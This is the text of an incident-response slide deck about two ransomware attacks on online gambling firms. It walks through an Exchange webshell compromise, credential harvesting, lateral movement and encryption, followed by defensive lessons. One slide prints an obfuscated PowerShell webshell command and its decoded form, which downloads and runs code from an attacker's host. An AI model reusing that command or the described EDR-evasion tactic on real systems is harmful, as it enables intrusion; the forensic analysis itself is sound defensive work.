This deck premiered at Black Hat in Las Vegas in August.
He explains two cases referring to the world of online gaming, in particular betting and online casinos.
These companies show two faces, on the one hand a great competence and attention to the quality of the code and the security of their portals, but they do not seem to be sensitive to the application of the same level of controls for what concerns their staff. As always the devil is in the details and the ransomware gangs know it well.
2. Who I Am: Stefano
• I am the Practice Manager of the Netwitness (RSA)
Incident Response.
• I began my ICT career in 1997 in Digital Corp, but I
started to crack software in 1985 with a Commodore
C64.
• I decided to get out of the cracking scene in 2000 to
focus on networking… until Nimda and Blaster came
out and cybersecurity became an interesting
career…
• I worked on the offensive side until 2009 when I
jumped into the IR bandwagon.
• Since then, I lead engagements around the world
covering investigation about sophisticated actors.
3. Agenda
❑ Introduction
❑ The first case
❑ Initial Compromise
❑ Second Phase, Second Actor
❑ Third Phase
❑ Ransomware in play
❑ The outcome
❑ The second case
❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lesson learned
5. Initial Compromise
▪ Through an active exploit of the Exchange Web Server, two webshells were uploaded to DC1-
EXCH01 on December 9, 2021.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
Logout.aspx
iisstart.aspx
The Exchange server
version was 2019 CU10
6. Evidence of Initial Attack
▪ The proximity in the file creation (a few milliseconds apart) in different paths, confirm the
webshells were dropped through an exploit with chained payloads.
▪ Web logs retention on the server was 30 days, so the logs rolled out before the investigation
started, but the webshells were likely uploaded via the exploit CVE-2021-42321, an RCE, based
on the folders used to drop them.
First Webshell
Basic loader
Second Webshell with
functions to interact with files
Timestomped dates
7. CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to issues with the validation of command-let
(cmdlet) arguments.
▪ In order to exploit this flaw, an attacker would
need to be authenticated.
The attack requires
execution of 4 POSTs
in a chain against
Exchange with an
authenticated user to
be successful.
8. We never leaked credentials…
▪ The attacker authenticated by leveraging on leaked credentials of a subcontractor working as
developer in the environment.
Yeah that account is
mine, but it is a personal
account… what it’s the
meaning of this?... And
how you collect it???
9. Logout.aspx Webshell
▪ This webshell is extremely simple, it call the IIS Worker process (w3wp.exe) to spawn the
Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe).
"cmd.exe" /c powershell -ep bypass -e
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3
RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
DECODED
10. Webshell Logic of iisstarts.aspx
▪ The second webshell allows the attacker to interact with the system through requests containing
the parameter cadataKey.
▪ If the cadataKey parameter is not specified, the web shell performs a redirection to the
errorFE.aspx page, returning a HTTP 404 code.
• The web shell included the ability to run arbitrary commands and upload, delete, and view the
contents of files.
• Once implanted, the webshell was allowing the attacker to access the environment with local
administration rights.
All commands specified through
this parameter are executed
through an eval statement.
12. Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to the DC1-EXCH00 and
few minutes later to DC1-EXCH01.
▪ This malicious file is loaded into processes and harvests clear text passwords in real time as
various users authenticate with the Exchange server.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
lsass.dll
iisstart.aspx
This long pause between the initial webshells and the
subsequent activity could be due to the initial attacker
selling access to the Ransomware attacker.
13. Second Phase, Second Actor
▪ The harvested credentials are saved into a file named:
▪ Hundreds of clear text credentials passwords were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain
controllers.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
iisstart.aspx
lsass.dll
iisstart.aspx
C:windowstemptmpQWER.tmp
User
Pass
C:windowstemptmpQWER.tmp.
User
Pass
The DLL uses the NPLogonNotify API provided by Microsoft to
extract cleartext credentials of users as they log into the servers
14. Second Phase, Second Actor
▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a Remote
Desktop software) on DC1-EXCH00 on 18 February 2022.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
atera.exe
iisstart.aspx
Atera is an IT management solution
that enables monitoring,
management, and automation of IT
networks from a single console.
lsass.dll
15. How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage a legitimate remote management agents (like Atera)
to survive possible Cobalt Strike detections from the EDR and Antivirus platforms.
▪ Relying upon a legitimate tool to achieve persistence is typically a Pen Tester approach and in
my personal perspective this can clarify the attacker background.
16. atera.exe
How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
DC1-EXCH00
DC1-DC0001
MUNICH
Data Center
23.183.81.113
Webshell
lsass.dll
atera.exe lsass.dll
The Atera package was uploaded on the Domain Controller
of the targeted Data Center (DC1-DC0001) together with the
credential dumper “lsass.exe”.
17. How to Complete the Job…
▪ On March 23, the attacker uploaded lsass.dll to the DC1-EXCH01:
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
lsass.dll
iisstart.aspx
He immediately started the credential harvesting on
this system.
18. Third Phase: 23 March – 5 April
▪ During this period attacker moved laterally to various systems, including Domain Controllers,
Backup servers, etc.
▪ Scanning and reconnaissance on the network were executed regularly.
DC1-DC0001
DC1-EXCH00
lsass.dll
lsass.dll
iisstart.aspx
atera.exe
During these scanning the attacker
identified the virtual infrastructure where
critical servers were operating.
Scanning
Workstations
Dev Systems
Virtual Infrastructure
MUNICH
Data Center
MUNICH
Office
20. Status
▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less
than 24 hours he collected about 12,45 Gb of data from the environment
including lots of payment and betting details.
▪ Unfortunately, up to this point, the attacker was able to work undetected. Why?
▪ To answer we should clarify the meaning and the role of an “Enabler of
Compromise,” but let’s see how the attack unfolded...
22. RDP + PSExec
Ransomware distribution
Ransomware in Play…
6 April 2022
The attacker executed a massive dissemination of
the ransomware executable with a combination of
RDPs and PsExec sessions.
DC1-DC0001
lsass.dll
atera.exe
Workstations
Dev Systems
Virtual Infrastructure
MUNICH
Data Center
MUNICH
Office
TORONTO
Data Center
MACAU
Data Center
23. Ransomware in Play…
▪ With a separated and tailored action, the attacker ensured the backup servers of the
company were encrypted, by leveraging another variant of the ransomware.
▪ This variant was also used against the company ESXi servers (about 50 hosts), which
adversely affected around 2000 virtual machines hosted in them.
▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”.
▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
24. Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them.
DC1-DC0001
Virtual Infrastructure
MUNICH
Data Center
atera.exe
Ransomware
Distribution via
SSH Sessions
Backup Infrastructure
Ransomware
installed manually
25. What we found: Network Forensics
▪ During the attack, the actor kept three systems untouched, in particular the Exchange server.
atera.exe
DC1-EXCH00
MUNICH
Data Center
TORONTO
Data Center
DC1-EXCH10
DC3-SPORS2
▪ This is due probably to the goal of keeping an eye upon the
target.
▪ In fact, the victim email system was still working despite the
encryption of the remaining systems…
26. The Outcome
▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services
allowing the company to slowly get back to business.
▪ From the end-users perspective the attack was a significant blow to the company’s reputation
and, at least initially, it impacted on the overall relationship with the company’s customer base.
▪ However, the gaming world has its own rules and 45 days later, it was like business as normal
in the company headquarters… apart for some minor, but meaningful details:
▪ Enhanced network visibility
▪ New staff for daily monitoring of network and infrastructures…
▪ No Splashtop, Teamviewer or Anydesk connections
▪ No scripts with hardcoded credentials
▪ New cybersecurity procedures
28. The second case: introduction
▪ This case targeted a group operating on the online casino sector with about 2.500 employees.
▪ The company has two data centers located in Australia and Hong Kong and operates mainly in the
Asian-Pacific market.
▪ The cybersecurity practice inside the Company at the time was mainly managed by one global MSSP
and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong
controls upon online services and data privacy.
▪ However, they left open several holes in their cybersecurity ecosystem…
Total lack of Network
visibility both internally
and in the Company
Private Cloud
Lack of organized logs
and limited endpoint
visibility
Lack of any behavior
analysis at user level
for internal staff
Limited investigative
and reactive
capabilities
Real-time Threat
detection limited to
“low hanging fruits”.
Lots of enablers of compromise…
Lack of proper
escalation plan for ICT
incidents
29. Attack Preparation
▪ The attack was organized around a flow very similar to the first case presented, with the
difference that the attacker this time targeted the staff with domain spoofing and spear-phishing.
Upload payload sharing it
with target
Send a file sharing
notification
Register “company.us” to
spoof “company.co.au”
Create
employee@company.us
email account
Acquire target’s email
through OSINT and send a
phishing email
Send a sounding email
discussing business and
meetings
Online File-sharing
Service Victim
Attacker
30. Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service
architecture.
▪ The email was asking to set a time for a call the following week about the content of the email.
MUNICH
Data Center
44.227.65.245
Attacker
31. BazarLoader
Exotic Lily + Conti in Action
Domain Spoofing
Spear-Phishing Campaign
Initial Compromise and Recon
Cobalt Strike
write,
execute
Exotic Lily
Download additional tools
Perform command-line recon
Harvest local and network credentials
Lateral Movement
Powershell
RDP: Splashtop, Anydesk
Stolen VPN and Admin Credentials
CONTI
RDP toward DCs
Atera Package
Application Servers
Exotic Lily C2
Leaks
SSL Sessions to C2
32. No Doubt on Attribution…
It was absolutely easy to attribute the attack to the Conti Ransomware
Gang, their banner was speaking for themselves:
34. Enablers of Compromise
▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider
expansion of the radius and the magnitude of the attack.
▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc…
These protocols, if exploited, could grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials,
unpatched public web servers or unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker could use a myriad of tools and techniques
to breach an organization’s network, steal sensitive information and compromise its
operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers to
successful cyber attacks.
An enabler of compromise is a pre-existing condition to the attack.
35. Script with Hardcoded Credentials
We found cron script /root/inventory_queries.sh on a critical repository containing login credentials
hardcoded, as illustrated here:
Also, we found cron jobs running under the root user that had a service account, including the password,
in cleartext.
36. Enablers of compromise or careless users???
Unreported Teamviewer and Anydesk usage.
During the analysis we found several systems connected to the company network with
TeamViewer and Anydesk remote control software installed.
The presence of remote control software in systems connected to the network may provide
additional access points that bypass existing security measures
Cracked software
During the analysis we found evidence of systems using cracked Windows licenses.
Powershell scripts with cleartext credentials
Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
Root password in root’s .bash_history
Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant
Enabler of Compromise…
You can notice here…
38. C O N F I D E N T I A L
It’s all about visibility… and a clean environment…
▪ The sophisticated nature of today’s threat landscape and actors continue to wreak havoc on
enterprise infrastructures, to our surprise, this occurs upon betting and online casino services
more than expected.
▪ Visibility is the key to protecting a network by actively looking for any security gap, vulnerability,
on-going cyber attack, and any anomaly or wrong usage of network resources.
▪ The rule is “If you don’t find them, you can’t fix them”.
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons why this is the case – the gaming industry may not understand
the importance of network visibility, for example, or lack the tools and resources to get started.
▪ In any case, the lack of adequate response from security teams is due to the dependency on
parameter-based security solutions that are not agile enough to deal with sophisticated threats
or is due to the limited spectrum of cybersecurity controls these companies enforce nowadays.
39. Visibility, Flexibility and Practice
Comprehensive Visibility Preparedness
Incident
Response
Retainer
Major Incident
Practice Drills
Cyber Insurance
Recovery
Planning
Preparedness
Proactive Detection
and Response
Reactive Capabilities